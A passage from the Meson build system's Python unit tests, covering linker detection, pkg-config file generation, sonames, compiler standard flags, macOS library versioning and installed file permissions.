if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP:
envvars.append(
mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
try:
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('Could not find a compiler for {}'.format(lang))
self.assertEqual(comp.linker.id, expected)
def test_link_environment_variable_lld_link(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('lld-link', 'c', 'lld-link')
def test_link_environment_variable_link(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('link', 'c', 'link')
def test_link_environment_variable_optlink(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('optlink', 'c', 'optlink')
@skip_if_not_language('rust')
def test_link_environment_variable_rust(self):
self._check_ld('link', 'rust', 'link')
@skip_if_not_language('d')
def test_link_environment_variable_d(self):
env = get_fake_env()
comp = getattr(env, 'detect_d_compiler')(MachineChoice.HOST)
if comp.id == 'dmd':
raise unittest.SkipTest('meson cannot reliably make DMD use a different linker.')
self._check_ld('lld-link', 'd', 'lld-link')
def test_pefile_checksum(self):
try:
import pefile
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('pefile module not found')
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir)
self.build()
# Test that binaries have a non-zero checksum
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
cc_id = cc.get_id()
ld_id = cc.get_linker_id()
dll = glob(os.path.join(self.builddir, '*mycpplib.dll'))[0]
exe = os.path.join(self.builddir, 'cppprog.exe')
for f in (dll, exe):
pe = pefile.PE(f)
msg = 'PE file: {!r}, compiler: {!r}, linker: {!r}'.format(f, cc_id, ld_id)
if cc_id == 'clang-cl':
# Latest clang-cl tested (7.0) does not write checksums out
self.assertFalse(pe.verify_checksum(), msg=msg)
else:
# Verify that a valid checksum was written by all other compilers
self.assertTrue(pe.verify_checksum(), msg=msg)
def test_qt5dependency_vscrt(self):
'''
Test that qt5 dependencies use the debug module suffix when b_vscrt is
set to 'mdd'
'''
# Verify that the `b_vscrt` option is available
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if 'b_vscrt' not in cc.base_options:
raise unittest.SkipTest('Compiler does not support setting the VS CRT')
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake') and not is_ci():
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output and not is_ci():
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Setup with /MDd
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Db_vscrt=mdd'])
# Verify that we're linking to the debug versions of Qt DLLs
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build qt5core.exe: cpp_LINKER.*Qt5Cored.lib', contents)
self.assertIsNotNone(m, msg=contents)
@unittest.skipUnless(is_osx(), "requires Darwin")
class DarwinTests(BasePlatformTests):
'''
Tests that should run on macOS
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx')
def test_apple_bitcode(self):
'''
Test that -fembed-bitcode is correctly added while compiling and
-bitcode_bundle is added while linking when b_bitcode is true and not
when it is false. This can't be an ordinary test case because we need
to inspect the compiler database.
'''
testdir = os.path.join(self.platform_test_dir, '7 bitcode')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.id != 'clang':
raise unittest.SkipTest('Not using Clang on OSX')
# Try with bitcode enabled
out = self.init(testdir, extra_args='-Db_bitcode=true')
# Warning was printed
self.assertRegex(out, 'WARNING:.*b_bitcode')
# Compiler options were added
for compdb in self.get_compdb():
if 'module' in compdb['file']:
self.assertNotIn('-fembed-bitcode', compdb['command'])
else:
self.assertIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
# Linker options were added
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNotNone(m, msg=contents)
# Try with bitcode disabled
self.setconf('-Db_bitcode=false')
# Regenerate build
self.build()
for compdb in self.get_compdb():
self.assertNotIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNone(m, msg=contents)
def test_apple_bitcode_modules(self):
'''
Same as above, just for shared_module()
'''
testdir = os.path.join(self.common_test_dir, '152 shared module resolving symbol in executable')
# Ensure that it builds even with bitcode enabled
self.init(testdir, extra_args='-Db_bitcode=true')
self.build()
self.run_tests()
def _get_darwin_versions(self, fname):
fname = os.path.join(self.builddir, fname)
out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True)
m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1])
self.assertIsNotNone(m, msg=out)
return m.groups()
@skipIfNoPkgconfig
def test_library_versioning(self):
'''
Ensure that compatibility_version and current_version are set correctly
'''
testdir = os.path.join(self.platform_test_dir, '2 library versions')
self.init(testdir)
self.build()
targets = {}
for t in self.introspect('--targets'):
targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename']
self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0'))
self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0'))
self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0'))
self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0'))
self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1'))
def test_duplicate_rpath(self):
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
# We purposely pass a duplicate rpath to Meson, in order
# to ascertain that Meson does not call install_name_tool
# with duplicate -delete_rpath arguments, which would
# lead to erroring out on installation
env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"}
self.init(testdir, override_envvars=env)
self.build()
self.install()
def test_removing_unused_linker_args(self):
testdir = os.path.join(self.common_test_dir, '108 has arg')
env = {'CFLAGS': '-L/tmp -L /var/tmp -headerpad_max_install_names -Wl,-export_dynamic'}
self.init(testdir, override_envvars=env)
@unittest.skipUnless(not is_windows(), "requires something Unix-like")
class LinuxlikeTests(BasePlatformTests):
'''
Tests that should run on Linux, macOS, and *BSD
'''
def test_basic_soname(self):
'''
Test that the soname is set correctly for shared libraries. This can't
be an ordinary test case because we need to run `readelf` and actually
check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '4 shared')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'libmylib.so')
soname = get_soname(lib1)
self.assertEqual(soname, 'libmylib.so')
def test_custom_soname(self):
'''
Test that the soname is set correctly for shared libraries when
a custom prefix and/or suffix is used. This can't be an ordinary test
case because we need to run `readelf` and actually check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '25 library versions')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'prefixsomelib.suffix')
soname = get_soname(lib1)
self.assertEqual(soname, 'prefixsomelib.suffix')
def test_pic(self):
'''
Test that -fPIC is correctly added to static libraries when b_staticpic
is true and not when it is false. This can't be an ordinary test case
because we need to inspect the compiler database.
'''
if is_windows() or is_cygwin() or is_osx():
raise unittest.SkipTest('PIC not relevant')
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir)
compdb = self.get_compdb()
self.assertIn('-fPIC', compdb[0]['command'])
self.setconf('-Db_staticpic=false')
# Regenerate build
self.build()
compdb = self.get_compdb()
self.assertNotIn('-fPIC', compdb[0]['command'])
def test_pkgconfig_gen(self):
'''
Test that generated pkg-config files can be found and have the correct
version and link args. This can't be an ordinary test case because we
need to run pkg-config outside of a Meson build file.
https://github.com/mesonbuild/meson/issues/889
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
self.assertTrue(foo_dep.found())
self.assertEqual(foo_dep.get_version(), '1.0')
self.assertIn('-lfoo', foo_dep.get_link_args())
self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar')
self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data')
libhello_nolib = PkgConfigDependency('libhello_nolib', env, kwargs)
self.assertTrue(libhello_nolib.found())
self.assertEqual(libhello_nolib.get_link_args(), [])
self.assertEqual(libhello_nolib.get_compile_args(), [])
def test_pkgconfig_gen_deps(self):
'''
Test that generated pkg-config files correctly handle dependencies
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
privatedir1 = self.privatedir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1})
privatedir2 = self.privatedir
os.environ
env = {
'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2]),
'PKG_CONFIG_SYSTEM_LIBRARY_PATH': '/usr/lib',
}
self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env)
# pkg-config strips some duplicated flags so we have to parse the
# generated file ourself.
expected = {
'Requires': 'libexposed',
'Requires.private': 'libfoo >= 1.0',
'Libs': '-L${libdir} -llibmain -pthread -lcustom',
'Libs.private': '-lcustom2 -L${libdir} -llibinternal',
'Cflags': '-I${includedir} -pthread -DCUSTOM',
}
if is_osx() or is_haiku():
expected['Cflags'] = expected['Cflags'].replace('-pthread ', '')
with open(os.path.join(privatedir2, 'dependency-test.pc')) as f:
matched_lines = 0
for line in f:
parts = line.split(':', 1)
if parts[0] in expected:
key = parts[0]
val = parts[1].strip()
expected_val = expected[key]
self.assertEqual(expected_val, val)
matched_lines += 1
self.assertEqual(len(expected), matched_lines)
cmd = ['pkg-config', 'requires-test']
out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'requires-private-test']
out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'pub-lib-order']
out = self._run(cmd + ['--libs'], override_envvars=env).strip().split()
self.assertEqual(out, ['-llibmain2', '-llibinternal'])
def test_pkgconfig_uninstalled(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
self.build()
os.environ['PKG_CONFIG_LIBDIR'] = os.path.join(self.builddir, 'meson-uninstalled')
if is_cygwin():
os.environ['PATH'] += os.pathsep + self.builddir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir)
self.build()
self.run_tests()
def test_pkg_unfound(self):
testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig')
self.init(testdir)
with open(os.path.join(self.privatedir, 'somename.pc')) as f:
pcfile = f.read()
self.assertFalse('blub_blob_blib' in pcfile)
def test_vala_c_warnings(self):
'''
Test that no warnings are emitted for C code generated by Vala. This
can't be an ordinary test case because we need to inspect the compiler
database.
https://github.com/mesonbuild/meson/issues/864
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '5 target glib')
self.init(testdir)
compdb = self.get_compdb()
vala_command = None
c_command = None
for each in compdb:
if each['file'].endswith('GLib.Thread.c'):
vala_command = each['command']
elif each['file'].endswith('GLib.Thread.vala'):
continue
elif each['file'].endswith('retcode.c'):
c_command = each['command']
else:
m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file'])
raise AssertionError(m)
self.assertIsNotNone(vala_command)
self.assertIsNotNone(c_command)
# -w suppresses all warnings, should be there in Vala but not in C
self.assertIn(" -w ", vala_command)
self.assertNotIn(" -w ", c_command)
# -Wall enables all warnings, should be there in C but not in Vala
self.assertNotIn(" -Wall ", vala_command)
self.assertIn(" -Wall ", c_command)
# -Werror converts warnings to errors, should always be there since it's
# injected by an unrelated piece of code and the project has werror=true
self.assertIn(" -Werror ", vala_command)
self.assertIn(" -Werror ", c_command)
@skipIfNoPkgconfig
def test_qtdependency_pkgconfig_detection(self):
'''
Test that qt4 and qt5 detection with pkgconfig works.
'''
# Verify Qt4 or Qt5 can be found with pkg-config
qt4 = subprocess.call(['pkg-config', '--exists', 'QtCore'])
qt5 = subprocess.call(['pkg-config', '--exists', 'Qt5Core'])
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=pkg-config'])
# Confirm that the dependency was found with pkg-config
mesonlog = self.get_meson_log()
if qt4 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)\n')
if qt5 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)\n')
@skip_if_not_base_option('b_sanitize')
def test_generate_gir_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
def test_qt5dependency_qmake_detection(self):
'''
Test that qt5 detection with qmake works. This can't be an ordinary
test case because it involves setting the environment.
'''
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake'):
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output:
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Disable pkg-config codepath and force searching with qmake/qmake-qt5
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=qmake'])
# Confirm that the dependency was found with qmake
mesonlog = self.get_meson_log()
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES .* \((qmake|qmake-qt5)\)\n')
def _test_soname_impl(self, libpath, install):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames')
testdir = os.path.join(self.unit_test_dir, '1 soname')
self.init(testdir)
self.build()
if install:
self.install()
# File without aliases set.
nover = os.path.join(libpath, 'libnover.so')
self.assertPathExists(nover)
self.assertFalse(os.path.islink(nover))
self.assertEqual(get_soname(nover), 'libnover.so')
self.assertEqual(len(glob(nover[:-3] + '*')), 1)
# File with version set
verset = os.path.join(libpath, 'libverset.so')
self.assertPathExists(verset + '.4.5.6')
self.assertEqual(os.readlink(verset), 'libverset.so.4')
self.assertEqual(get_soname(verset), 'libverset.so.4')
self.assertEqual(len(glob(verset[:-3] + '*')), 3)
# File with soversion set
soverset = os.path.join(libpath, 'libsoverset.so')
self.assertPathExists(soverset + '.1.2.3')
self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(len(glob(soverset[:-3] + '*')), 2)
# File with version and soversion set to same values
settosame = os.path.join(libpath, 'libsettosame.so')
self.assertPathExists(settosame + '.7.8.9')
self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(len(glob(settosame[:-3] + '*')), 2)
# File with version and soversion set to different values
bothset = os.path.join(libpath, 'libbothset.so')
self.assertPathExists(bothset + '.1.2.3')
self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3')
self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6')
self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3')
self.assertEqual(len(glob(bothset[:-3] + '*')), 3)
def test_soname(self):
self._test_soname_impl(self.builddir, False)
def test_installed_soname(self):
libdir = self.installdir + os.path.join(self.prefix, self.libdir)
self._test_soname_impl(libdir, True)
def test_compiler_check_flags_order(self):
'''
Test that compiler check flags override all other flags. This can't be
an ordinary test case because it needs the environment to be set.
'''
testdir = os.path.join(self.common_test_dir, '39 has function')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
Oflag = '-O3'
OflagCPP = Oflag
if cpp.get_id() in ('clang', 'gcc'):
# prevent developers from adding "int main(int argc, char **argv)"
# to small Meson checks unless these parameters are actually used
OflagCPP += ' -Werror=unused-parameter'
env = {'CFLAGS': Oflag,
'CXXFLAGS': OflagCPP}
self.init(testdir, override_envvars=env)
cmds = self.get_meson_log_compiler_checks()
for cmd in cmds:
if cmd[0] == 'ccache':
cmd = cmd[1:]
# Verify that -I flags from the `args` kwarg are first
# This is set in the '39 has function' test case
self.assertEqual(cmd[1], '-I/tmp')
# Verify that -O3 set via the environment is overridden by -O0
Oargs = [arg for arg in cmd if arg.startswith('-O')]
self.assertEqual(Oargs, [Oflag, '-O0'])
def _test_stds_impl(self, testdir, compiler, p: str):
has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0'))
has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
# Check that all the listed -std=xxx options for this compiler work just fine when used
# https://en.wikipedia.org/wiki/Xcode#Latest_versions
# https://www.gnu.org/software/gcc/projects/cxx-status.html
for v in compiler.get_options()['std'].choices:
lang_std = p + '_std'
# we do it like this to handle gnu++17,c++17 and gnu17,c17 cleanly
# thus, C++ first
if '++17' in v and not has_cpp17:
continue
elif '++2a' in v and not has_cpp2a_c17: # https://en.cppreference.com/w/cpp/compiler_support
continue
# now C
elif '17' in v and not has_cpp2a_c17:
continue
elif '18' in v and not has_c18:
continue
std_opt = '{}={}'.format(lang_std, v)
self.init(testdir, extra_args=['-D' + std_opt])
cmd = self.get_compdb()[0]['command']
# c++03 and gnu++03 are not understood by ICC, don't try to look for them
skiplist = frozenset([
('intel', 'c++03'),
('intel', 'gnu++03')])
if v != 'none' and not (compiler.get_id(), v) in skiplist:
cmd_std = " -std={} ".format(v)
self.assertIn(cmd_std, cmd)
try:
self.build()
except Exception:
print('{} was {!r}'.format(lang_std, v))
raise
self.wipe()
# Check that an invalid std option in CFLAGS/CPPFLAGS fails
# Needed because by default ICC ignores invalid options
cmd_std = '-std=FAIL'
if p == 'c':
env_flag_name = 'CFLAGS'
elif p == 'cpp':
env_flag_name = 'CXXFLAGS'
else:
raise NotImplementedError('Language {} not defined.'.format(p))
env = {}
env[env_flag_name] = cmd_std
with self.assertRaises((subprocess.CalledProcessError, mesonbuild.mesonlib.EnvironmentException),
msg='C compiler should have failed with -std=FAIL'):
self.init(testdir, override_envvars = env)
# ICC won't fail in the above because additional flags are needed to
# make unknown -std=... options errors.
self.build()
def test_compiler_c_stds(self):
'''
Test that C stds specified for this compiler can all be used. Can't be
an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cc, 'c')
def test_compiler_cpp_stds(self):
'''
Test that C++ stds specified for this compiler can all be used. Can't
be an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '2 cpp')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cpp, 'cpp')
def test_unity_subproj(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir, extra_args='--unity=subprojects')
simpletest_id = Target.construct_id_from_path('subprojects/sublib', 'simpletest', '@exe')
self.assertPathExists(os.path.join(self.builddir, 'subprojects/sublib', simpletest_id, 'simpletest-unity0.c'))
sublib_id = Target.construct_id_from_path('subprojects/sublib', 'sublib', '@sha')
self.assertPathExists(os.path.join(self.builddir, 'subprojects/sublib', sublib_id, 'sublib-unity0.c'))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c'))
self.build()
def test_installed_modes(self):
'''
Test that files installed by these tests have the correct permissions.
Can't be an ordinary test because our installed_files.txt is very basic.
'''
# Test file modes
testdir = os.path.join(self.common_test_dir, '12 data')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'etc', 'etcfile.dat')
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'rw------T'
self.assertEqual(want_mode, found_mode[1:])
f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-sr-x'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
self.assertEqual(0, statf.st_gid)
f = os.path.join(self.installdir, 'usr', 'share', 'progname',
'fileobject_datafile.dat')
orig = os.path.join(testdir, 'fileobject_datafile.dat')
statf = os.stat(f)
statorig = os.stat(orig)
found_mode = stat.filemode(statf.st_mode)
orig_mode = stat.filemode(statorig.st_mode)
self.assertEqual(orig_mode[1:], found_mode[1:])
self.assertEqual(os.getuid(), statf.st_uid)
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_gid)
self.wipe()
# Test directory modes
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-x--t'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
def test_installed_modes_extended(self):
'''
Test that files are installed with correct permissions using install_mode.
'''
testdir = os.path.join(self.common_test_dir, '195 install_mode')
self.init(testdir)
self.build()
self.install()
for fsobj, want_mode in [
('bin', 'drwxr-x---'),
('bin/runscript.sh', '-rwxr-sr-x'),
('bin/trivialprog', '-rwxr-sr-x'),
('include', 'drwxr-x---'),
('include/config.h', '-rw-rwSr--'),
('include/rootdir.h', '-r--r--r-T'),
('lib', 'drwxr-x---'),
('lib/libstat.a', '-rw---Sr--'),
('share', 'drwxr-x---'),
('share/man', 'drwxr-x---'),
('share/man/man1', 'drwxr-x---'),
('share/man/man1/foo.1', '-r--r--r-T'),
('share/sub1', 'drwxr-x---'),
('share/sub1/second.dat', '-rwxr-x--t'),
('subdir', 'drwxr-x---'),
('subdir/data.dat', '-rw-rwSr--'),
]:
f = os.path.join(self.installdir, 'usr', *fsobj.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(fsobj, want_mode, found_mode)))
# Ensure that introspect --installed works on all types of files
# FIXME: also verify the files list
self.introspect('--installed')
def test_install_umask(self):
'''
Test that files are installed with correct permissions using default
install umask of 022, regardless of the umask at time the worktree
was checked out or the build was executed.
'''
# Copy source tree to a temporary directory and change permissions
# there to simulate a checkout with umask 002.
orig_testdir = os.path.join(self.unit_test_dir, '26 install umask')
# Create a new testdir under tmpdir.
tmpdir = os.path.realpath(tempfile.mkdtemp())
self.addCleanup(windows_proof_rmtree, tmpdir)
testdir = os.path.join(tmpdir, '26 install umask')
# Copy the tree using shutil.copyfile, which will use the current umask
# instead of preserving permissions of the old tree.
save_umask = os.umask(0o002)
self.addCleanup(os.umask, save_umask)
shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile)
# Preserve the executable status of subdir/sayhello though.
os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775)
self.init(testdir)
# Run the build under a 027 umask now.
os.umask(0o027)
self.build()
# And keep umask 027 for the install step too.
self.install()
for executable in [
'bin/prog',
'share/subdir/sayhello',
]:
f = os.path.join(self.installdir, 'usr', *executable.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(executable, want_mode, found_mode)))
for directory in [
'usr',
'usr/bin',
'usr/include',
'usr/share',
'usr/share/man',
'usr/share/man/man1',
'usr/share/subdir',
]:
f = os.path.join(self.installdir, *directory.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'drwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected directory %s to have mode %s but found %s instead.' %
(directory, want_mode, found_mode)))
for datafile in [
'include/sample.h',
'share/datafile.cat',
'share/file.dat',
'share/man/man1/prog.1',
'share/subdir/datafile.dog',
]:
f = os.path.join(self.installdir, 'usr', *datafile.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rw-r--r--'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(datafile, want_mode, found_mode)))
def test_cpp_std_override(self):
testdir = os.path.join(self.unit_test_dir, '6 std override')
self.init(testdir)
compdb = self.get_compdb()
# Don't try to use -std=c++03 as a check for the
# presence of a compiler flag, as ICC does not
# support it.
for i in compdb:
if 'prog98' in i['file']:
c98_comp = i['command']
if 'prog11' in i['file']:
c11_comp = i['command']
if 'progp' in i['file']:
plain_comp = i['command']
self.assertNotEqual(len(plain_comp), 0)
self.assertIn('-std=c++98', c98_comp)
self.assertNotIn('-std=c++11', c98_comp)
self.assertIn('-std=c++11', c11_comp)
self.assertNotIn('-std=c++98', c11_comp)
self.assertNotIn('-std=c++98', plain_comp)
self.assertNotIn('-std=c++11', plain_comp)
# Now werror
self.assertIn('-Werror', plain_comp)
self.assertNotIn('-Werror', c98_comp)
def test_run_installed(self):
if is_cygwin() or is_osx():
raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable')
testdir = os.path.join(self.unit_test_dir, '7 run installed')
self.init(testdir)
self.build()
self.install()
installed_exe = os.path.join(self.installdir, 'usr/bin/prog')
installed_libdir = os.path.join(self.installdir, 'usr/foo')
installed_lib = os.path.join(installed_libdir, 'libfoo.so')
self.assertTrue(os.path.isfile(installed_exe))
self.assertTrue(os.path.isdir(installed_libdir))
self.assertTrue(os.path.isfile(installed_lib))
# Must fail when run without LD_LIBRARY_PATH to ensure that
# rpath has been properly stripped rather than pointing to the builddir.
self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0)
# When LD_LIBRARY_PATH is set it should start working.
# For some reason setting LD_LIBRARY_PATH in os.environ fails
# when all tests are run (but works when only this test is run),
# but doing this explicitly works.
env = os.environ.copy()
env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')])
self.assertEqual(subprocess.call(installed_exe, env=env), 0)
# Ensure that introspect --installed works
installed = self.introspect('--installed')
for v in installed.values():
self.assertTrue('prog' in v or 'foo' in v)
@skipIfNoPkgconfig
def test_order_of_l_arguments(self):
testdir = os.path.join(self.unit_test_dir, '8 -L -l order')
self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
# NOTE: .pc file has -Lfoo -lfoo -Lbar -lbar but pkg-config reorders
# the flags before returning them to -Lfoo -Lbar -lfoo -lbar
# but pkgconf seems to not do that. Sigh. Support both.
expected_order = [('-L/me/first', '-lfoo1'),
('-L/me/second', '-lfoo2'),
('-L/me/first', '-L/me/second'),
('-lfoo1', '-lfoo2'),
('-L/me/second', '-L/me/third'),
('-L/me/third', '-L/me/fourth',),
('-L/me/third', '-lfoo3'),
('-L/me/fourth', '-lfoo4'),
('-lfoo3', '-lfoo4'),
]
with open(os.path.join(self.builddir, 'build.ninja')) as ifile:
